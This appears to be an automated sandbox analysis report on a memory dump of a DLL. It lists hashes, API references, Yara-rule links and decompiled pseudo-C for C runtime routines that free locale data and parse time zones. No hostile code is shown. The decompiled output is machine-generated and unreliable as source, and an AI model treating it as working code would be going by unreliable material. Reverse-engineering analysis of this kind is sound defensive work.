Opcode Fuzzy Hash: e64a50a3e118709bbd2b4ed081a0e8f6ffab8031618818d84a770bf0c62c3d82
Instruction Fuzzy Hash: 5BF0F436A5452AABDB249A748809BBB7768EB40B1CF624429ED19F3240EF74FD4186D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE23952, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6DE12361: EnterCriticalSection.KERNEL32(-000BFC7F,?,6DE192B1,00000000,6DE92CE8,0000000C,6DE1926C,?,?,?,6DE1C822,?,?,6DE1D6B4,00000001,00000364), ref: 6DE12370

EnumSystemLocalesW.KERNEL32(6DE2390C,00000001,6DE93078,0000000C), ref: 6DE2398A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 9447ac1704fa733fac72d16f8e3ade41abc6e3a43a289c23917bdf4389b58639
Instruction ID: 9a5450b154813b796ebc68706e05886051575743cba8d3d11a8196dbc5079abc
Opcode Fuzzy Hash: 9447ac1704fa733fac72d16f8e3ade41abc6e3a43a289c23917bdf4389b58639
Instruction Fuzzy Hash: 8BF04932A16204EFDB10EF68C845B6D37F0EB06325F22811BF514DF295CB7589459F91

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E00E, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

EnumSystemLocalesW.KERNEL32(6DE2DF65,00000001,00000006,?,?,6DE2E7EE,;m,?,?,?,?,?,6DE1E03B,?,?,?), ref: 6DE2E045

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: b199ff3abdb5fdaf6d9ef9099c6d47422dc7fa4d4a1317ed143aa6556806986a
Instruction ID: 3ec44c4aaf268e206564c6a13b0c789c62ca6bfc0f479a97e4618ffd5fb49e87
Opcode Fuzzy Hash: b199ff3abdb5fdaf6d9ef9099c6d47422dc7fa4d4a1317ed143aa6556806986a
Instruction Fuzzy Hash: C2F0A03A30424657CB049F39C844A7A7BA4EFC1B18B164058EB09CB640CA759882C790

Uniqueness

Uniqueness Score: -1.00%

Function 6DE0E079, Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 6DE0E1E9

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction ID: 232276402c385dcaa8318ac6e2515c7aadd0c8215f06a7132de9ea08e26ac9b1
Opcode Fuzzy Hash: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction Fuzzy Hash: DF515670718E4797DB21467889517BE3795AB42F0CF30893ED992E7381CE56DA32C352

Uniqueness

Uniqueness Score: -1.00%

Function 6DE184BB, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction ID: e2e5b79766c4fac567066a081ae1d47f433150042560e41f132722fe3ebf53c8
Opcode Fuzzy Hash: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction Fuzzy Hash: 55327E74A0820AEFCB14CF58CDD4ABEB7B5FF85308F254168D945A7305DB32AA56CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE267D9, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7726c68f5711268022ddcb06ad793ed1d54300b4349cf001b057857629ffda14
Instruction ID: be7af415c059f5eff49edc76d82769e4560cb9d637232b36ff7c7c6b03e55664
Opcode Fuzzy Hash: 7726c68f5711268022ddcb06ad793ed1d54300b4349cf001b057857629ffda14
Instruction Fuzzy Hash: 7A321821D69F414DDB236534C862339B2A8AFB73D4F25D72BF819B5A99EF29C4C34140

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF3E00, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 8c6100d7f90fdac3b56d40bb00bcd7512a36a32afd1087e8f2ddcff058417660
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: FD115BB7201183C3D741ABEDC4B46BBB395EFC622472B437AF0618B656C22391439602

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB16BC, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a646dfd7dc5994fda2fe1ccd64227671b5e999f341e422c2883f5efe9d8e05f0
Instruction ID: 454e84eb8a2259d871b727de35ee958c6bda00147171f06d9757b3b5b7d3f2c7
Opcode Fuzzy Hash: a646dfd7dc5994fda2fe1ccd64227671b5e999f341e422c2883f5efe9d8e05f0
Instruction Fuzzy Hash: D9F01C75700545DFD704DF14C540F26B7E8FB09A14F144269E826CB791DB35E800CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6de950b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6DE1CBD3(_t46);
							E6DE2C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6DE1CBD3(_t47);
							E6DE2CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6DE1CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6DE1CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6DE2C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6de952b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6DE1CBD3(_t31);
							E6DE1CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6DE1CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6DE1CBD3(_t74);
			}

0x6de2bf6c
0x6de2bf70
0x6de2bf78
0x6de2bf81
0x6de2bf86
0x6de2bf8d
0x6de2bf95
0x6de2bf9d
0x6de2bfa8
0x6de2bfae
0x6de2bfaf
0x6de2bfb7
0x6de2bfbf
0x6de2bfca
0x6de2bfd0
0x6de2bfd4
0x6de2bfdf
0x6de2bfe5
0x6de2bf86
0x6de2bfe6
0x6de2bfee
0x6de2c001
0x6de2c014
0x6de2c022
0x6de2c02d
0x6de2c032
0x6de2c03b
0x6de2c043
0x6de2c044
0x6de2c044
0x6de2c04a
0x6de2c04d
0x6de2c04d
0x6de2c050
0x6de2c057
0x6de2c059
0x6de2c05d
0x6de2c065
0x6de2c06c
0x6de2c072
0x6de2c073
0x6de2c073
0x6de2c07a
0x6de2c07c
0x6de2c081
0x6de2c089
0x6de2c08e
0x6de2c08f
0x6de2c08f
0x6de2c092
0x6de2c095
0x6de2c098
0x6de2c09b
0x6de2c09b
0x6de2c0ad

APIs

___free_lconv_mon.LIBCMT ref: 6DE2BFA8

Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C7EC
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C7FE
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C810
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C822
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C834
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C846
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C858
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C86A
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C87C
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C88E
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8A0
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8B2
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8C4

_free.LIBCMT ref: 6DE2BF9D

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2BFBF
_free.LIBCMT ref: 6DE2BFD4
_free.LIBCMT ref: 6DE2BFDF
_free.LIBCMT ref: 6DE2C001
_free.LIBCMT ref: 6DE2C014
_free.LIBCMT ref: 6DE2C022
_free.LIBCMT ref: 6DE2C02D
_free.LIBCMT ref: 6DE2C065
_free.LIBCMT ref: 6DE2C06C
_free.LIBCMT ref: 6DE2C089
_free.LIBCMT ref: 6DE2C0A1

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d52aa74de3377c90392bc2e9f4b894d72393686db59f321cb1bb3421556c863d
Instruction ID: c258c08bf26d04b448ed377935d82c122569170a8f62c4328a88371dc3493123
Opcode Fuzzy Hash: d52aa74de3377c90392bc2e9f4b894d72393686db59f321cb1bb3421556c863d
Instruction Fuzzy Hash: 6D311B31B092069FEB219A35DC84FAAB3F9AF0075CF31482DE568E7651DF71E9908B50

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DE2877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6DE2822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6DE28289( &_v8) != 0 || E6DE28231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6DE2822B();
					_t32 =  &_v52; // 0x6de42130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6DE28289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6DE12188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6de9506c; // 0x20895150
						_v100 = _t74 ^ _t192;
						 *0x6de95384 =  *0x6de95384 | 0xffffffff;
						 *0x6de95378 =  *0x6de95378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6de97a10 = 0;
						_t78 = E6DE21216(0x6de42130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6de42130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6DE1F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6DE21216(0x6de42130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6de42130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6DE1CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6DE1CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6DE2877C(0x6de42130, _t172, __eflags);
							}
						}
						E6DE1CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6DDEF8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6DE28231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6DE2825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6DE1CBD3( *0x6de97a08);
								 *0x6de97a08 = 0;
								 *_t194 = 0x6de97a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6de97a18 * 0x3c;
									_t168 =  *0x6de97a6c; // 0x0
									_push(_t171);
									 *0x6de97a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6de97a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6de97ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6de97ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6DE13CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6de97a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6de97a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6DE28225()) = _v12;
								 *((intOrPtr*)(E6DE28219())) = _v16;
								_t96 = E6DE2821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6de97a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6DE1CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6de28b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6de28b6e
						 *0x6de97a08 = E6DE1F26D(_t154 - _t170, _t13);
						_t116 = E6DE1CBD3(0);
						_t167 =  *0x6de97a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6de28b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6de28b6e
							_t119 = E6DE1AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6DE33B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6DE1BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6DE1BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6DE1BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6DE28225()) = _v8;
										_t128 = E6DE28219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6DE33B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

0x6de2877c
0x6de28786
0x6de2878b
0x6de2878f
0x6de28791
0x6de28799
0x6de287a4
0x6de28944
0x6de28946
0x6de28947
0x6de28948
0x6de28949
0x6de2894a
0x6de2894b
0x6de28950
0x6de28954
0x6de28956
0x6de28959
0x6de28960
0x6de28964
0x6de28967
0x6de2896b
0x6de2896e
0x6de28971
0x6de28976
0x6de28977
0x6de28979
0x6de28aa1
0x6de28aa1
0x6de28aa2
0x6de28aa3
0x6de28aa4
0x6de28aa5
0x6de28aa6
0x6de28aab
0x6de28aae
0x6de28aaf
0x6de28ab7
0x6de28abe
0x6de28ac1
0x6de28ace
0x6de28ad5
0x6de28ad6
0x6de28ad7
0x6de28add
0x6de28aec
0x6de28af3
0x6de28afb
0x6de28afd
0x6de28b07
0x6de28b0a
0x6de28b17
0x6de28b1a
0x6de28b1c
0x6de28b35
0x6de28b3d
0x6de28b3f
0x6de28b45
0x6de28b4a
0x6de28b41
0x6de28b41
0x00000000
0x6de28b41
0x6de28b1e
0x6de28b1e
0x6de28b1f
0x6de28b1f
0x6de28b1f
0x6de28b4c
0x6de28aff
0x6de28aff
0x6de28aff
0x6de28b59
0x6de28b5b
0x6de28b5d
0x6de28b5f
0x6de28b6f
0x6de28b6f
0x6de28b61
0x6de28b61
0x6de28b64
0x00000000
0x6de28b66
0x6de28b66
0x6de28b67
0x6de28b6c
0x6de28b64
0x6de28b75
0x6de28b80
0x6de28b8b
0x6de2897f
0x6de28983
0x6de28988
0x6de28989
0x6de2898b
0x00000000
0x6de28991
0x6de28995
0x6de2899a
0x6de2899b
0x6de2899d
0x00000000
0x6de289a3
0x6de289a9
0x6de289ae
0x6de289b4
0x6de289bb
0x6de289c1
0x6de289c4
0x6de289ca
0x6de289d1
0x6de289d7
0x6de289db
0x6de289e1
0x6de289e4
0x6de289eb
0x6de289f0
0x6de289f0
0x6de289f2
0x6de289f2
0x6de289f5
0x6de289fc
0x6de28a14
0x6de28a14
0x6de28a17
0x6de289fe
0x6de289fe
0x6de28a03
0x6de28a05
0x00000000
0x6de28a07
0x6de28a09
0x6de28a0f
0x6de28a0f
0x6de28a05
0x6de28a1f
0x6de28a33
0x6de28a39
0x6de28a3b
0x6de28a49
0x6de28a4b
0x6de28a3d
0x6de28a3d
0x6de28a40
0x00000000
0x6de28a42
0x6de28a44
0x6de28a44
0x6de28a40
0x6de28a60
0x6de28a67
0x6de28a69
0x6de28a78
0x6de28a7b
0x6de28a6b
0x6de28a6b
0x6de28a6e
0x00000000
0x6de28a70
0x6de28a73
0x6de28a73
0x6de28a6e
0x6de28a69
0x6de28a85
0x6de28a8f
0x6de28a94
0x6de28a99
0x6de28aa0
0x6de28aa0
0x6de2899d
0x6de2898b
0x6de287bc
0x6de287bc
0x6de287c2
0x6de287c7
0x6de287fd
0x6de287fe
0x6de28804
0x6de28806
0x6de28806
0x6de28809
0x6de28809
0x6de2880b
0x6de2880c
0x6de28812
0x6de2881d
0x6de28822
0x6de28827
0x6de28831
0x00000000
0x6de28837
0x6de28837
0x6de28839
0x6de2883a
0x6de2883a
0x6de2883d
0x6de2883d
0x6de2883f
0x6de28840
0x6de28847
0x6de2884c
0x6de28851
0x6de28856
0x6de2885e
0x6de2885f
0x6de28865
0x6de2886a
0x6de2886f
0x6de28875
0x6de2887a
0x6de2887b
0x6de2887e
0x00000000
0x00000000
0x00000000
0x6de2887e
0x6de28883
0x6de28884
0x6de28889
0x6de2888b
0x6de2888b
0x6de28893
0x6de28899
0x6de2889c
0x6de2889c
0x6de288a0
0x00000000
0x00000000
0x6de288aa
0x6de288aa
0x6de288ad
0x6de288b0
0x6de288b2
0x6de288c0
0x6de288c2
0x6de288cc
